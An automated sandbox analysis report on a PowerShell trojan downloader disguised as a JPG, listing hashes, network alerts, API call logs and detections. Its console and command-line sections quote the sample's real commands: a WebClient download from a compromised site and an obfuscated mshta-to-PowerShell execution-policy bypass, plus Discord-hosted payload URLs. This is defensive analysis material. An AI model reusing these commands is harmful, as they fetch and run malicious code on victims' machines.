Summary | ZeroBOX

qv55b3lqjXhJQckX.jpg.ps1

Category: FILE
Machine: s1_win7_x6402
Started: May 31, 2021, 11:22 a.m.
Completed: May 31, 2021, 11:24 a.m.
Size 1.2KB
Type ASCII text, with CRLF line terminators
MD5 6ee03a2d6b4558fa09cdf1e33dcaa897
SHA256 cd4cddc487e2666f0c41cce589d535f726d13c40810be3900c3e94696a132eed
CRC32 94B9E537
ssdeep 24:lqnyah4CoT8V7O+gbb8oT8V7L+gbbjb+PKQrjZkyzebeS:Anyah4Co8nYb8o8IYbjb+CQ3Zky6bb
Yara None matched

IP Address Status Action
162.159.135.233 Active Moloch
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
192.169.204.60 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49811 -> 192.169.204.60:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49809 -> 162.159.135.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49810 -> 192.169.204.60:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow: TLSv1 192.168.56.102:49809 -> 162.159.135.233:443
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2
Subject: C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Fingerprint: a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Mode LastWriteTime Length Name
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: d---- 2021-05-31 오전 11:22 Start
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\qv55b3lqjXhJQckX.jpg.ps1:20 char:50
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + if((New-Object System.Net.WebClient).DownloadFile <<<< ('https://lavishcuisin
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: e.com/wp-content/uploads/2015/v4ZH58inZ8qGCx2B.jpg' , $ali + 'msynci.ps1')){
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: mshta
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: vbscript:Execute("CreateObject(""WScript.Shell"").Run ""p"+"ow"+"ersh"+"ell -Ex"+"ecuti"+"onPol"+"icy Bypa"+"ss & 'C"+":\Us"+"ers\P"+"ubl"+"ic\msynci"+".ps1'"", 0:close")
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The term 'C:\Users\Public\msynci.ps1' is not recognized as the name of a cmdlet
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: , function, script file, or operable program. Check the spelling of the name, o
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: r if a path was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:2
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + & <<<< 'C:\Users\Public\msynci.ps1'
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (C:\Users\Public\msynci.ps1:Stri
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: ng) [], CommandNotFoundException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000077
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050237d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050237d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00570898
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005710d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005710d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005710d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00570d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00570dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00570dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00570dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00570dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://cdn.discordapp.com/attachments/834258459628535898/844363329371897866/firefox.lnk
suspicious_features GET method with no useragent header suspicious_request GET https://cdn.discordapp.com/attachments/834258459628535898/846168516519657512/firefox.bat
request GET https://cdn.discordapp.com/attachments/834258459628535898/844363329371897866/firefox.lnk
request GET https://cdn.discordapp.com/attachments/834258459628535898/846168516519657512/firefox.bat
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026cf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f49000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05861000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02892000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02893000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02894000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 786432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06740000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f4d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4980
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3624
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc91000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc92000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3624
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\ProgramData\Microsoft Arts\Start\firefox.lnk
file C:\Users\Public\firefox.bat
file C:\ProgramData\Microsoft Arts\Start\firefox.lnk
file C:\Users\Public\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""p"+"ow"+"ersh"+"ell -Ex"+"ecuti"+"onPol"+"icy Bypa"+"ss & 'C"+":\Us"+"ers\P"+"ubl"+"ic\msynci"+".ps1'"", 0:close")
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msynci.ps1'
cmdline powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msynci.ps1'
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -ExecutionPolicy Bypass & 'C:\Users\Public\msynci.ps1'
filepath: powershell
1 1 0
ESET-NOD32 PowerShell/TrojanDownloader.Agent.DVJ
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 172.217.25.14
file C:\Users\Public\msynci.ps1
file C:\ProgramData\Microsoft Arts\Start\firefox.lnk
Time & API Arguments Status Return Repeated

send

buffer: uq`´HtèZ¡KÛ"t³Þ½ÄÞbžRM­! ׶ æ2†,ÿ/5 ÀÀÀ À 280ÿcdn.discordapp.com  
socket: 1544
sent: 122
1 122 0

send

buffer: FBAïºËmÞ|C{n[ä^/×=ž†6=¦Ù¦%³-š¡Åõ€N+ˆR%ï¹¾1Ò@ÆȚg"x!……¡œÍ->0fкÎYÊ<Žufæ³¥Jb-$)¿¤Ií”ë¡XÍËëùøø@IÓª 8½—Œþ
socket: 1544
sent: 134
1 134 0

send

buffer:  cË¡3)íU\÷îjƒîx\ƒG®ò«±±ÅÕ²â`³3Éç(^ĖF¬têg„¤S„¦:D…%[ѕíšªÿHMµ?Nô¨huKeMá¹ñó…„+”7ø……•¬mMBŠNò2:7Œà'§çjZt'ÿ֞PD‡”9dÒü*›ý‰žtË Ýüo¤ó¿LÏå8Ì ~IO| Åù
socket: 1544
sent: 165
1 165 0

send

buffer: €Geš­ŸáìùŽv-ƒzô·´ 6è[I…7ô aÎV4}až0‹G•ú÷Í_Rt»]š’´’ïŠaPÙ+žÇYÝäVn£²IÈ̟¯6mŠÐ4ŠdÈæÚ/Êî¿ÓñG^ìÌ!€QN@C7lØ:_›f-¡F8xbÇvb^ûù*¦P
socket: 1544
sent: 133
1 133 0

send

